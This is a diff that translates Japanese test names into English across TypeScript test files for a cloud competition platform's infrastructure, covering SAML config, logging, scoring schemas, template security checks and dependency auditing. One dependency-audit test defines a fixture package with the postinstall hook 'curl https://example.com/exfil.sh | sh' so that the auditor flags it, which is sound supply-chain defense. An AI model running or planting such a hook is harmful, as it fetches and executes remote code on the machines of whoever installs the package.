+++ b/infrastructure/test/problem-deploy/tenant-saml.test.ts
@@ -38,21 +38,21 @@ import type { CompetitorAccountsSharedResources } from "../../lib/problem-deploy
  */
 
 describe("TenantSamlConfigInputSchema (Zod)", () => {
-  it("metadataUrl が HTTPS なら通すべき", () => {
+  it("should pass through when metadataUrl is HTTPS", () => {
     const r = TenantSamlConfigInputSchema.safeParse({
       metadataUrl: "https://idp.example.com/metadata.xml",
     });
     expect(r.success).toBe(true);
   });
 
-  it("HTTP の metadataUrl は reject すべき (= 平文 metadata 経路を作らない)", () => {
+  it("should reject HTTP metadataUrl (no plaintext metadata path)", () => {
     const r = TenantSamlConfigInputSchema.safeParse({
       metadataUrl: "http://idp.example.com/metadata.xml",
     });
     expect(r.success).toBe(false);
   });
 
-  it("providerName は英数字 + -_ の 3-32 字に絞るべき", () => {
+  it("providerName should be restricted to 3-32 chars of alphanumerics + -_", () => {
     expect(
       TenantSamlConfigInputSchema.safeParse({
         metadataUrl: "https://idp.example.com/metadata.xml",
@@ -86,13 +86,13 @@ describe("TenantSamlConfigInputSchema (Zod)", () => {
 });
 
 describe("normalizeAttributeMapping", () => {
-  it("undefined なら default email mapping のみ返すべき", () => {
+  it("should return only the default email mapping when undefined", () => {
     expect(normalizeAttributeMapping(undefined)).toEqual({
       email: "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress",
     });
   });
 
-  it("caller の email override が default に勝つべき (= Entra ID 等)", () => {
+  it("caller email override should win over the default (e.g. Entra ID)", () => {
     expect(normalizeAttributeMapping({ email: "urn:custom:user/email" })).toEqual({
       email: "urn:custom:user/email",
     });
@@ -115,7 +115,7 @@ describe("extractUserPoolIdFromIss", () => {
     ).toBe("ap-northeast-1_AbCdEfG12");
   });
 
-  it("undefined / 空文字 / 不正 URL は undefined を返すべき", () => {
+  it("should return undefined for undefined / empty string / invalid URL", () => {
     expect(extractUserPoolIdFromIss(undefined)).toBeUndefined();
     expect(extractUserPoolIdFromIss("")).toBeUndefined();
     expect(extractUserPoolIdFromIss("https://example.com")).toBeUndefined();
@@ -138,7 +138,7 @@ function makeCognitoDeps() {
 }
 
 describe("upsertSamlProvider", () => {
-  it("既存 (Describe 成功) なら UpdateIdentityProviderCommand を送るべき", async () => {
+  it("should send UpdateIdentityProviderCommand when the provider already exists (Describe succeeds)", async () => {
     const { send, deps } = makeCognitoDeps();
     send.mockResolvedValueOnce({}); // describe ok
     send.mockResolvedValueOnce({}); // update
@@ -152,7 +152,7 @@ describe("upsertSamlProvider", () => {
     expect(send.mock.calls[1][0]).toBeInstanceOf(UpdateIdentityProviderCommand);
   });
 
-  it("Describe が ResourceNotFoundException なら CreateIdentityProviderCommand に倒れるべき", async () => {
+  it("should fall through to CreateIdentityProviderCommand on Describe ResourceNotFoundException", async () => {
     const { send, deps } = makeCognitoDeps();
     const err = new Error("not found") as Error & { name?: string };
     err.name = "ResourceNotFoundException";
@@ -364,7 +364,7 @@ describe("handleGetTenantSamlConfig", () => {
 });
 
 describe("handlePutTenantSamlConfig", () => {
-  it("validation 失敗なら 400 を返し Cognito / DDB を呼ばないべき", async () => {
+  it("should return 400 without calling Cognito / DDB on validation failure", async () => {
     const { shared, ddbSend, cognitoSend } = makeSharedAndDdb();
     const r = await handlePutTenantSamlConfig(
       shared,
@@ -414,7 +414,7 @@ describe("handlePutTenantSamlConfig", () => {
     expect(ddbSend).toHaveBeenCalledTimes(1);
   });
 
-  it("enforceSamlOnly=true なら enforceSamlOnlyOnClient (= SupportedIdentityProviders=[SAML] のみ) を呼ぶべき", async () => {
+  it("should call enforceSamlOnlyOnClient (SupportedIdentityProviders=[SAML] only) when enforceSamlOnly=true", async () => {
     const { shared, ddbSend, cognitoSend } = makeSharedAndDdb();
     cognitoSend.mockResolvedValueOnce({}); // describe IdP ok (= exists)
     cognitoSend.mockResolvedValueOnce({}); // update IdP

--- a/infrastructure/test/problem-deploy/trace-log.test.ts
+++ b/infrastructure/test/problem-deploy/trace-log.test.ts
@@ -22,7 +22,7 @@ describe("trace-log helpers", () => {
     errorSpy.mockRestore();
   });
 
-  it("logDeployTrace は JSON 1 行で event / level=info / component=problem-deploy / timestamp を出力するべき", () => {
+  it("logDeployTrace should emit a single JSON line with event / level=info / component=problem-deploy / timestamp", () => {
     logDeployTrace("deploy.create.enqueued", { jobId: "01ABC", correlationId: "01ABC" });
     expect(logSpy).toHaveBeenCalledTimes(1);
     const payload = JSON.parse(logSpy.mock.calls[0]?.[0] as string);
@@ -34,7 +34,7 @@ describe("trace-log helpers", () => {
     expect(payload.correlationId).toBe("01ABC");
   });
 
-  it("warnDeployTrace は level=warn を吐くべき (= grace-fallback 等の通知用)", () => {
+  it("warnDeployTrace should emit at level=warn (for grace-fallback notifications etc.)", () => {
     warnDeployTrace("deploy.describe-stack.assume-role.grace-fallback", {
       jobId: "01XYZ",
       externalIdVersion: 3,
@@ -45,14 +45,14 @@ describe("trace-log helpers", () => {
     expect(payload.externalIdVersion).toBe(3);
   });
 
-  it("errorDeployTrace は level=error を吐くべき", () => {
+  it("errorDeployTrace should emit at level=error", () => {
     errorDeployTrace("deploy.cfn.deploy.failed", { jobId: "01ZZZ" });
     expect(errorSpy).toHaveBeenCalledTimes(1);
     const payload = JSON.parse(errorSpy.mock.calls[0]?.[0] as string);
     expect(payload.level).toBe("error");
   });
 
-  it("undefined な field は出力 JSON から除外すべき (= log size 節約 + Logs Insights の column 汚染防止)", () => {
+  it("should omit undefined fields from output JSON (save log size + avoid Logs Insights column pollution)", () => {
     logDeployTrace("deploy.test", {
       jobId: "01ABC",
       optional: undefined,
@@ -63,21 +63,21 @@ describe("trace-log helpers", () => {
     expect(payload.defined).toBe("value");
   });
 
-  it("fields 引数を省略しても crash せず最小 JSON を出すべき", () => {
+  it("should emit minimal JSON without crashing even when fields argument is omitted", () => {
     logDeployTrace("deploy.healthz");
     const payload = JSON.parse(logSpy.mock.calls[0]?.[0] as string);
     expect(payload.event).toBe("deploy.healthz");
     expect(payload.level).toBe("info");
   });
 
-  it("timestamp は ISO 8601 文字列で再 parse 可能であるべき", () => {
+  it("timestamp should be an ISO 8601 string that re-parses", () => {
     logDeployTrace("deploy.test");
     const payload = JSON.parse(logSpy.mock.calls[0]?.[0] as string);
     const parsed = new Date(payload.timestamp);
     expect(Number.isNaN(parsed.getTime())).toBe(false);
   });
 
-  it("net JSON はパース可能で多重 quote / newline を破壊しないべき", () => {
+  it("net JSON should be parseable and not break on nested quotes / newlines", () => {
     logDeployTrace("deploy.eventbridge.publish.succeeded", {
       detailType: 'DeployCreate"Requested',
       resource: "line1\nline2",

--- a/infrastructure/test/problem-deploy/trust-bridge-shadow.test.ts
+++ b/infrastructure/test/problem-deploy/trust-bridge-shadow.test.ts
@@ -53,7 +53,7 @@ function captureLogs(): {
 }
 
 describe("emitShadowAudit (#795 Phase 3 shadow)", () => {
-  it("正常 params で trust-bridge.shadow.audit を decision=allow で emit すべき", () => {
+  it("should emit trust-bridge.shadow.audit with decision=allow on normal params", () => {
     const cap = captureLogs();
     try {
       emitShadowAudit(baseParams());
@@ -70,7 +70,7 @@ describe("emitShadowAudit (#795 Phase 3 shadow)", () => {
     }
   });
 
-  it("action=destroy も同じ audit shape で emit すべき", () => {
+  it("should emit action=destroy with the same audit shape", () => {
     const cap = captureLogs();
     try {
       emitShadowAudit(baseParams({ action: "destroy" }));
@@ -82,7 +82,7 @@ describe("emitShadowAudit (#795 Phase 3 shadow)", () => {
     }
   });
 
-  it("ttlSeconds=0 (= schema 違反) でも throw せず warn + audit deny を emit すべき (= fail-open)", () => {
+  it("should not throw but warn and emit audit deny on ttlSeconds=0 (schema violation) (fail-open)", () => {
     const cap = captureLogs();
     try {
       expect(() => emitShadowAudit(baseParams({ ttlSeconds: 0 }))).not.toThrow();
@@ -97,7 +97,7 @@ describe("emitShadowAudit (#795 Phase 3 shadow)", () => {
     }
   });
 
-  it("ttlSeconds=9999 (= schema 上限超過) も同様に fail-open で audit deny を emit すべき", () => {
+  it("should likewise emit audit deny fail-open on ttlSeconds=9999 (above schema cap)", () => {
     const cap = captureLogs();
     try {
       expect(() => emitShadowAudit(baseParams({ ttlSeconds: 9999 }))).not.toThrow();
@@ -108,7 +108,7 @@ describe("emitShadowAudit (#795 Phase 3 shadow)", () => {
     }
   });
 
-  it("competitorRoleArn が未指定でも intent を組めて allow を emit すべき (= same-account dev path)", () => {
+  it("should still build an intent and emit allow when competitorRoleArn is unset (same-account dev path)", () => {
     const cap = captureLogs();
     try {
       emitShadowAudit(baseParams({ competitorRoleArn: undefined }));
@@ -119,7 +119,7 @@ describe("emitShadowAudit (#795 Phase 3 shadow)", () => {
     }
   });
 
-  it("teamSlug 未指定でも intent を組めて teamId field 無しの audit を emit すべき", () => {
+  it("should still build an intent and emit an audit without teamId field when teamSlug is unset", () => {
     const cap = captureLogs();
     try {
       emitShadowAudit(baseParams({ teamSlug: undefined }));

--- a/infrastructure/test/problem-deploy/visibility.test.ts
+++ b/infrastructure/test/problem-deploy/visibility.test.ts
@@ -9,25 +9,25 @@ import {
  * presigned URL 発行可否判定の pin。 dormant-default と fail-safe parse の挙動を検証する。
  */
 describe("parseProblemsVisibility (Issue #642)", () => {
-  it("undefined / 空文字列なら空 map を返すべき (= 全 public 扱い)", () => {
+  it("should return an empty map for undefined / empty string (treated as all public)", () => {
     expect(parseProblemsVisibility(undefined)).toEqual({});
     expect(parseProblemsVisibility("")).toEqual({});
   });
 
-  it("不正な JSON は warn しつつ空 map を返すべき (= fail-safe)", () => {
+  it("should warn and return an empty map on invalid JSON (fail-safe)", () => {
     const consoleSpy = vi.spyOn(console, "warn").mockImplementation(() => {});
     expect(parseProblemsVisibility("{not json")).toEqual({});
     expect(consoleSpy).toHaveBeenCalledOnce();
     consoleSpy.mockRestore();
   });
 
-  it("JSON でも array / 非 object なら空 map を返すべき", () => {
+  it("should return an empty map for JSON arrays / non-objects", () => {
     expect(parseProblemsVisibility("[]")).toEqual({});
     expect(parseProblemsVisibility('"private"')).toEqual({});
     expect(parseProblemsVisibility("42")).toEqual({});
   });
 
-  it('value が "private" のキーだけ抜き出すべき', () => {
+  it('should extract only keys whose value is "private"', () => {
     const raw = JSON.stringify({
       "secret-problem": "private",
       "public-problem": "public",
@@ -58,7 +58,7 @@ describe("resolveChallengePayloadBucket (Issue #642)", () => {
     ).toBeUndefined();
   });
 
-  it("visibility が undefined でも安全に undefined を返すべき", () => {
+  it("should safely return undefined when visibility is undefined", () => {
     expect(
       resolveChallengePayloadBucket({
         problemId: "any-problem",
@@ -68,7 +68,7 @@ describe("resolveChallengePayloadBucket (Issue #642)", () => {
     ).toBeUndefined();
   });
 
-  it("bucketName + visibility 両方揃ったら bucket 名を返すべき", () => {
+  it("should return the bucket name when bucketName + visibility are both set", () => {
     expect(
       resolveChallengePayloadBucket({
         problemId: "secret-problem",

--- a/infrastructure/test/problems-schema-hints.test.ts
+++ b/infrastructure/test/problems-schema-hints.test.ts
@@ -41,12 +41,12 @@ function baseProblem(scoring: unknown): Record<string, unknown> {
   };
 }
 
-describe("[#742 Phase 5] SCHEMA.json: hints は全 5 kind で valid であるべき", () => {
+describe("[#742 Phase 5] SCHEMA.json: hints should be valid across all 5 kinds", () => {
   const validate = createValidator();
   const validV2Hint = { id: "hint-1", content: "first hint", penalty: 10 } as const;
   const validV1Hint = "legacy string hint";
 
-  it("kind=flag で hints (v2) を受け入れるべき", () => {
+  it("should accept hints (v2) for kind=flag", () => {
     const ok = validate(
       baseProblem({
         kind: "flag",
@@ -59,7 +59,7 @@ describe("[#742 Phase 5] SCHEMA.json: hints は全 5 kind で valid であるべ
     expect(ok).toBe(true);
   });
 
-  it("kind=uptime (legacy) で hints を受け入れるべき", () => {
+  it("should accept hints for kind=uptime (legacy)", () => {
     const ok = validate(
       baseProblem({
         kind: "uptime",
@@ -72,7 +72,7 @@ describe("[#742 Phase 5] SCHEMA.json: hints は全 5 kind で valid であるべ
     expect(ok).toBe(true);
   });
 
-  it("kind=uptime-flat で hints を受け入れるべき", () => {
+  it("should accept hints for kind=uptime-flat", () => {
     const ok = validate(
       baseProblem({
         kind: "uptime-flat",
@@ -85,7 +85,7 @@ describe("[#742 Phase 5] SCHEMA.json: hints は全 5 kind で valid であるべ
     expect(ok).toBe(true);
   });
 
-  it("kind=uptime-multi で hints を受け入れるべき", () => {
+  it("should accept hints for kind=uptime-multi", () => {
     const ok = validate(
       baseProblem({
         kind: "uptime-multi",
@@ -98,7 +98,7 @@ describe("[#742 Phase 5] SCHEMA.json: hints は全 5 kind で valid であるべ
     expect(ok).toBe(true);
   });
 
-  it("kind=phased-polling で hints を受け入れるべき", () => {
+  it("should accept hints for kind=phased-polling", () => {
     const ok = validate(
       baseProblem({
         kind: "phased-polling",
@@ -112,7 +112,7 @@ describe("[#742 Phase 5] SCHEMA.json: hints は全 5 kind で valid であるべ
     expect(ok).toBe(true);
   });
 
-  it("kind=attack-detection で hints を受け入れるべき", () => {
+  it("should accept hints for kind=attack-detection", () => {
     const ok = validate(
       baseProblem({
         kind: "attack-detection",
@@ -126,10 +126,10 @@ describe("[#742 Phase 5] SCHEMA.json: hints は全 5 kind で valid であるべ
   });
 });
 
-describe("[#742 Phase 5] SCHEMA.json: hints の不正 shape を reject すべき", () => {
+describe("[#742 Phase 5] SCHEMA.json: should reject invalid hints shape", () => {
   const validate = createValidator();
 
-  it("hints 要素から `id` が欠落していたら reject すべき (= v2 object の required)", () => {
+  it("should reject when a hints element is missing `id` (required in v2 object)", () => {
     const ok = validate(
       baseProblem({
         kind: "flag",
@@ -141,7 +141,7 @@ describe("[#742 Phase 5] SCHEMA.json: hints の不正 shape を reject すべき
     expect(ok).toBe(false);
   });
 
-  it("hints[].penalty が負値なら reject すべき (= minimum 0)", () => {
+  it("should reject when hints[].penalty is negative (minimum 0)", () => {
     const ok = validate(
       baseProblem({
         kind: "uptime-flat",
@@ -153,7 +153,7 @@ describe("[#742 Phase 5] SCHEMA.json: hints の不正 shape を reject すべき
     expect(ok).toBe(false);
   });
 
-  it("hints[] に object 内 unknown property があったら reject すべき (= additionalProperties false)", () => {
+  it("should reject hints[] objects with unknown properties (additionalProperties false)", () => {
     const ok = validate(
       baseProblem({
         kind: "attack-detection",
@@ -165,7 +165,7 @@ describe("[#742 Phase 5] SCHEMA.json: hints の不正 shape を reject すべき
     expect(ok).toBe(false);
   });
 
-  it("hints が array でなければ reject すべき", () => {
+  it("should reject when hints is not an array", () => {
     const ok = validate(
       baseProblem({
         kind: "flag",

--- a/infrastructure/test/scoring-metadata.test.ts
+++ b/infrastructure/test/scoring-metadata.test.ts
@@ -8,7 +8,7 @@ import { parseScoringEnv, parseScoringMetadata } from "../lib/utils/scoring-meta
 
 describe("parseScoringMetadata", () => {
   describe("flag 形式", () => {
-    it("flagOutputKey + points が揃っていれば narrow するべき", () => {
+    it("should narrow when flagOutputKey + points are both set", () => {
       expect(
         parseScoringMetadata({ kind: "flag", flagOutputKey: "ParameterValue", points: 100 }),
       ).toEqual({
@@ -146,7 +146,7 @@ describe("parseScoringMetadata", () => {
   });
 
   describe("[#742 Phase 5] hints は全 5 kind に共通拡張", () => {
-    it("uptime-flat kind が hints を受け入れて ProgressiveHint[] に正規化すべき", () => {
+    it("uptime-flat kind should accept hints and normalize them to ProgressiveHint[]", () => {
       const result = parseScoringMetadata({
         kind: "uptime-flat",
         endpoints: [{ slot: "main", path: "/", expectStatus: [200] }],
@@ -158,7 +158,7 @@ describe("parseScoringMetadata", () => {
       expect(result.hints).toEqual([{ id: "h1", content: "first endpoint", penalty: 5 }]);
     });
 
-    it("uptime-multi kind が hints を受け入れるべき (v1 legacy も同様に動く)", () => {
+    it("uptime-multi kind should accept hints (v1 legacy works too)", () => {
       const result = parseScoringMetadata({
         kind: "uptime-multi",
         probedSlots: [{ slot: "frontend", path: "/", expectStatus: [200] }],
@@ -170,7 +170,7 @@ describe("parseScoringMetadata", () => {
       expect(result.hints).toEqual([{ id: "hint-1", content: "legacy hint", penalty: 0 }]);
     });
 
-    it("phased-polling kind が hints を受け入れるべき", () => {
+    it("phased-polling kind should accept hints", () => {
       const result = parseScoringMetadata({
         kind: "phased-polling",
         intervalMinutes: 1,
@@ -185,7 +185,7 @@ describe("parseScoringMetadata", () => {
       ]);
     });
 
-    it("attack-detection kind が hints を受け入れるべき", () => {
+    it("attack-detection kind should accept hints", () => {
       const result = parseScoringMetadata({
         kind: "attack-detection",
         statsOutputKey: "AttackCount",
@@ -210,7 +210,7 @@ describe("parseScoringMetadata", () => {
   });
 
   describe("uptime 形式 (legacy alias of uptime-flat)", () => {
-    it("endpoints が array + pointsPerSuccess が number なら narrow するべき", () => {
+    it("should narrow when endpoints is an array and pointsPerSuccess is a number", () => {
       const cfg = {
         kind: "uptime",
         endpoints: [{ outputKey: "FrontendUrl", path: "/", expectStatus: [200] }],
@@ -226,7 +226,7 @@ describe("parseScoringMetadata", () => {
   });
 
   describe("uptime-flat 形式 (ADR-012 Phase 3.B 新名)", () => {
-    it("slot 経由の endpoint を narrow するべき", () => {
+    it("should narrow slot-based endpoints", () => {
       const cfg = {
         kind: "uptime-flat",
         endpoints: [{ slot: "frontend", path: "/", expectStatus: [200] }],
@@ -235,7 +235,7 @@ describe("parseScoringMetadata", () => {
       expect(parseScoringMetadata(cfg)).toEqual(cfg);
     });
 
-    it("slot も outputKey も無い endpoint は drop すべき", () => {
+    it("should drop endpoints lacking both slot and outputKey", () => {
       expect(
         parseScoringMetadata({
           kind: "uptime-flat",
@@ -247,7 +247,7 @@ describe("parseScoringMetadata", () => {
   });
 
   describe("uptime-multi 形式", () => {
-    it("probedSlots + pointsAllOk が揃っていれば narrow すべき", () => {
+    it("should narrow when probedSlots + pointsAllOk are both set", () => {
       const cfg = {
         kind: "uptime-multi",
         probedSlots: [{ slot: "frontend", path: "/", expectStatus: [200] }],
@@ -271,7 +271,7 @@ describe("parseScoringMetadata", () => {
   });
 
   describe("phased-polling 形式", () => {
-    it("intervalMinutes + probe + platformRules が揃っていれば narrow すべき", () => {
+    it("should narrow when intervalMinutes + probe + platformRules are all set", () => {
       const cfg = {
         kind: "phased-polling",
         intervalMinutes: 1,
@@ -315,7 +315,7 @@ describe("parseScoringMetadata", () => {
   });
 
   describe("attack-detection 形式", () => {
-    it("statsOutputKey + pointsPerAttack が揃っていれば narrow すべき", () => {
+    it("should narrow when statsOutputKey + pointsPerAttack are both set", () => {
       const cfg = {
         kind: "attack-detection",
         statsOutputKey: "AttackCounter",
@@ -348,25 +348,25 @@ describe("parseScoringMetadata", () => {
       [],
       { kind: "wrong-kind" },
       { points: 100 },
-    ])("%s は undefined を返すべき", (input) => {
+    ])("should return undefined for %s", (input) => {
       expect(parseScoringMetadata(input)).toBeUndefined();
     });
   });
 });
 
 describe("parseScoringEnv", () => {
-  it("undefined / 空文字 / 壊れた JSON は空 map を返すべき", () => {
+  it("should return an empty map for undefined / empty string / broken JSON", () => {
     expect(parseScoringEnv(undefined)).toEqual({});
     expect(parseScoringEnv("")).toEqual({});
     expect(parseScoringEnv("{not-json")).toEqual({});
   });
 
-  it("array や primitive は空 map を返すべき", () => {
+  it("should return an empty map for arrays or primitives", () => {
     expect(parseScoringEnv(JSON.stringify(["x"]))).toEqual({});
     expect(parseScoringEnv(JSON.stringify(123))).toEqual({});
   });
 
-  it("混在 entries は valid なものだけ拾うべき", () => {
+  it("should pick up only the valid entries in a mixed set", () => {
     const raw = JSON.stringify({
       "valid-flag": { kind: "flag", flagOutputKey: "X", points: 100 },
       "valid-uptime": {

--- a/infrastructure/test/scripts/audit-dependencies.test.ts
+++ b/infrastructure/test/scripts/audit-dependencies.test.ts
@@ -33,7 +33,7 @@ describe("audit-dependencies (ADR mini Shai-Hulud 2nd 対策)", () => {
     );
   }
 
-  it("baseline が無いと ok=false / mode='baseline-missing' を返すべき", () => {
+  it("should return ok=false / mode='baseline-missing' when the baseline is missing", () => {
     writePackage("safe-pkg", { scripts: { test: "noop" } });
     // BASELINE_PATH は scripts/audit-baseline.json で固定。 ここでは production baseline を
     // 触らない (= production node_modules vs production baseline は別 test で見る) ので、
@@ -45,7 +45,7 @@ describe("audit-dependencies (ADR mini Shai-Hulud 2nd 対策)", () => {
     expect(["baseline-missing", "diff"]).toContain(outcome.mode);
   });
 
-  it("install-time lifecycle script (postinstall) を持つ package を発見すべき", () => {
+  it("should discover packages with install-time lifecycle scripts (postinstall)", () => {
     writePackage("malicious-pkg", {
       scripts: { postinstall: "curl https://example.com/exfil.sh | sh" },
     });
@@ -60,7 +60,7 @@ describe("audit-dependencies (ADR mini Shai-Hulud 2nd 対策)", () => {
     expect(addedNames).toContain("malicious-pkg");
   });
 
-  it("publish-time のみ実行される prepublish / prepublishOnly は監査対象外であるべき", () => {
+  it("publish-time-only prepublish / prepublishOnly should be out of audit scope", () => {
     writePackage("publish-only-pkg", {
       scripts: { prepublish: "yarn build", prepublishOnly: "yarn test" },
     });
@@ -72,7 +72,7 @@ describe("audit-dependencies (ADR mini Shai-Hulud 2nd 対策)", () => {
     expect(addedNames).not.toContain("publish-only-pkg");
   });
 
-  it("script が無い package は監査対象外であるべき", () => {
+  it("packages without scripts should be out of audit scope", () => {
     writePackage("no-scripts-pkg", {});
     writePackage("empty-scripts-pkg", { scripts: {} });
     const outcome = runAudit({ nodeModulesPath: join(tmpRoot, "node_modules") });
@@ -82,7 +82,7 @@ describe("audit-dependencies (ADR mini Shai-Hulud 2nd 対策)", () => {
     expect(addedNames).not.toContain("empty-scripts-pkg");
   });
 
-  it("scoped package (@scope/pkg) の lifecycle script も discover すべき", () => {
+  it("should also discover lifecycle scripts in scoped packages (@scope/pkg)", () => {
     writePackage("@evil/scoped-pkg", {
       scripts: { preinstall: "echo pwned" },
     });
@@ -92,7 +92,7 @@ describe("audit-dependencies (ADR mini Shai-Hulud 2nd 対策)", () => {
     expect(addedNames).toContain("@evil/scoped-pkg");
   });
 
-  it("壊れた node_modules entry (= broken symlink 等) は無視すべき", () => {
+  it("should ignore broken node_modules entries (broken symlinks etc.)", () => {
     // 存在しない dir を nodeModulesPath に渡しても crash せず空 result を返す。
     const outcome = runAudit({
       nodeModulesPath: join(tmpRoot, "does-not-exist"),
@@ -105,7 +105,7 @@ describe("audit-dependencies (ADR mini Shai-Hulud 2nd 対策)", () => {
 
   // production baseline が現状とずれていないことの整合性 check は別途
   // `make audit-deps` を実行する。 ここでは unit pin に絞る。
-  it("baseline 不在を skip 不可: production node_modules でも mode は決定論的に返るべき", () => {
+  it("should never skip on missing baseline: mode should be returned deterministically even on production node_modules", () => {
     // production node_modules を fake に置き換えずに呼ぶケース (= baseline がある + 現状一致)。
     // 期待: 別途実行される `bun run scripts/audit-dependencies.ts` で ok=true になっていることが
     // 整合の証拠。 本 test は呼び出し interface が落ちないことだけ pin。

--- a/infrastructure/test/scripts/check-template-cfn-refs.test.ts
+++ b/infrastructure/test/scripts/check-template-cfn-refs.test.ts
@@ -27,7 +27,7 @@ import {
 const REPO_ROOT = new URL("../../../", import.meta.url).pathname;
 
 describe("check-template-cfn-refs script (#951 sub-2)", () => {
-  it("既存 5 問題 template は全 pass するべき (= smoke test)", () => {
+  it("all 5 existing problem templates should pass (smoke test)", () => {
     const result = spawnSync("bun", ["run", "scripts/check-template-cfn-refs.ts"], {
       cwd: REPO_ROOT,
       encoding: "utf-8",
@@ -101,7 +101,7 @@ Outputs:
 });
 
 describe("check-template-cfn-refs unit (= 抽出した helper の挙動を pin)", () => {
-  it("parseSections: Resources / Parameters / Outputs を分離して name を集めるべき", () => {
+  it("parseSections: should separate Resources / Parameters / Outputs and collect names", () => {
     const yaml = `AWSTemplateFormatVersion: "2010-09-09"
 Parameters:
   NamePrefix:
@@ -123,7 +123,7 @@ Outputs:
     expect([...sections.outputs].sort()).toEqual(["RoleArn"]);
   });
 
-  it("parseSections: 他の top-level section (Conditions 等) に入ったら currentSection を抜けるべき", () => {
+  it("parseSections: should exit currentSection on entering other top-level sections (e.g. Conditions)", () => {
     const yaml = `Resources:
   A:
     Type: AWS::Foo
@@ -137,7 +137,7 @@ Resources:
     expect([...sections.resources].sort()).toEqual(["A", "B"]);
   });
 
-  it("collectRefs: !Ref shortform と Ref: longform の両方を拾うべき", () => {
+  it("collectRefs: should pick up both !Ref shortform and Ref: longform", () => {
     const yaml = `Resources:
   A:
     Properties:
@@ -148,7 +148,7 @@ Resources:
     expect(collectRefs(yaml).sort()).toEqual(["ExternalId", "NamePrefix"]);
   });
 
-  it("collectGetAttResources: !GetAtt と Fn::GetAtt の両方を拾うべき", () => {
+  it("collectGetAttResources: should pick up both !GetAtt and Fn::GetAtt", () => {
     const yaml = `Resources:
   Out:
     Value: !GetAtt Role.Arn
@@ -159,7 +159,7 @@ Resources:
     expect(collectGetAttResources(yaml).sort()).toEqual(["Bucket", "Role"]);
   });
 
-  it("collectSubRefs: \\${Var} は ref、 \\${X.Y} は getAtt、 \\${!Literal} は無視すべき", () => {
+  it("collectSubRefs: should treat \\${Var} as ref, \\${X.Y} as getAtt, and ignore \\${!Literal}", () => {
     const yaml = `Foo: !Sub "\${NamePrefix}-suffix"
 Bar: !Sub "arn:\${AWS::Partition}:s3:::bucket"
 Baz: !Sub "arn:s3:::\${Role.Arn}"

--- a/infrastructure/test/scripts/check-template-security.test.ts
+++ b/infrastructure/test/scripts/check-template-security.test.ts
@@ -17,19 +17,19 @@ const PATH = "problems/test/template.yaml";
 
 describe("check-template-security helpers (#869 + #1124)", () => {
   describe("findIamActionWildcardFindings", () => {
-    it('Action: "*" を 1 件以上含むなら finding を返すべき', () => {
+    it('should return a finding when at least one Action: "*" is present', () => {
       const findings = findIamActionWildcardFindings(PATH, "Resources.A.Properties", ["*"]);
       expect(findings).toHaveLength(1);
       expect(findings[0]?.rule).toBe("iam-action-wildcard");
     });
 
-    it('Action 配列に "*" が無ければ 0 件にすべき', () => {
+    it('should return 0 findings when the Action array contains no "*"', () => {
       expect(findIamActionWildcardFindings(PATH, "loc", ["s3:GetObject", "s3:PutObject"])).toEqual(
         [],
       );
     });
 
-    it('複数の "*" は複数 finding として返すべき (= 同 statement 内重複も検出)', () => {
+    it('should return multiple findings for multiple "*"s (detect duplicates within the same statement)', () => {
       expect(findIamActionWildcardFindings(PATH, "loc", ["*", "*", "s3:GetObject"])).toHaveLength(
         2,
       );
@@ -37,14 +37,14 @@ describe("check-template-security helpers (#869 + #1124)", () => {
   });
 
   describe("findIamResourceWildcardFindings", () => {
-    it('Resource: "*" + allowlist 外の action なら finding を返すべき', () => {
+    it('should return a finding for Resource: "*" + actions outside the allowlist', () => {
       const findings = findIamResourceWildcardFindings(PATH, "loc", ["*"], ["s3:DeleteObject"]);
       expect(findings).toHaveLength(1);
       expect(findings[0]?.rule).toBe("iam-resource-wildcard");
       expect(findings[0]?.detail).toContain("s3:DeleteObject");
     });
 
-    it('Resource: "*" + allowlist 内 action だけなら finding を返さないべき', () => {
+    it('should not return a finding for Resource: "*" + actions strictly within the allowlist', () => {
       const findings = findIamResourceWildcardFindings(
         PATH,
         "loc",
@@ -54,7 +54,7 @@ describe("check-template-security helpers (#869 + #1124)", () => {
       expect(findings).toEqual([]);
     });
 
-    it('Resource: "*" が無ければ 0 件にすべき (= scoped ARN は OK)', () => {
+    it('should return 0 findings when Resource: "*" is absent (scoped ARNs are OK)', () => {
       expect(
         findIamResourceWildcardFindings(
           PATH,
@@ -65,7 +65,7 @@ describe("check-template-security helpers (#869 + #1124)", () => {
       ).toEqual([]);
     });
 
-    it('Resource: "*" + action 空配列なら finding を返すべき (= allowlist 判定不能)', () => {
+    it('should return a finding for Resource: "*" + empty action array (allowlist undecidable)', () => {
       const findings = findIamResourceWildcardFindings(PATH, "loc", ["*"], []);
       expect(findings).toHaveLength(1);
       expect(findings[0]?.detail).toContain("Resource");
@@ -73,7 +73,7 @@ describe("check-template-security helpers (#869 + #1124)", () => {
   });
 
   describe("findSgOpenNonWebFinding", () => {
-    it("0.0.0.0/0 から 80/443 以外への ingress は finding を返すべき", () => {
+    it("should return a finding for ingress from 0.0.0.0/0 to ports other than 80/443", () => {
       const finding = findSgOpenNonWebFinding(PATH, "Sg", 0, {
         CidrIp: "0.0.0.0/0",
         FromPort: 22,
@@ -82,7 +82,7 @@ describe("check-template-security helpers (#869 + #1124)", () => {
       expect(finding?.detail).toContain("port 22");
     });
 
-    it("0.0.0.0/0 + 80 / 443 は finding を返さないべき (= 競技 web は OK)", () => {
+    it("should not return a finding for 0.0.0.0/0 + 80 / 443 (competition web is OK)", () => {
       expect(
         findSgOpenNonWebFinding(PATH, "Sg", 0, { CidrIp: "0.0.0.0/0", FromPort: 80 }),
       ).toBeUndefined();
@@ -91,13 +91,13 @@ describe("check-template-security helpers (#869 + #1124)", () => {
       ).toBeUndefined();
     });
 
-    it("CidrIp が 0.0.0.0/0 でないなら finding を返さないべき", () => {
+    it("should not return a finding when CidrIp is not 0.0.0.0/0", () => {
       expect(
         findSgOpenNonWebFinding(PATH, "Sg", 0, { CidrIp: "10.0.0.0/8", FromPort: 22 }),
       ).toBeUndefined();
     });
 
-    it("FromPort が string でも number に変換して判定すべき", () => {
+    it("should convert FromPort to a number before evaluating, even if it is a string", () => {
       const finding = findSgOpenNonWebFinding(PATH, "Sg", 1, {
         CidrIp: "0.0.0.0/0",
         FromPort: "22",

--- a/infrastructure/test/scripts/inspect-problem.test.ts
+++ b/infrastructure/test/scripts/inspect-problem.test.ts
@@ -7,7 +7,7 @@ import { runInspect } from "../../../scripts/tenkacloud-problem";
  */
 
 describe("runInspect (#951 sub #5)", () => {
-  it("hello-world: flag kind の scoring + template Outputs + cross-ref OK を含むべき", () => {
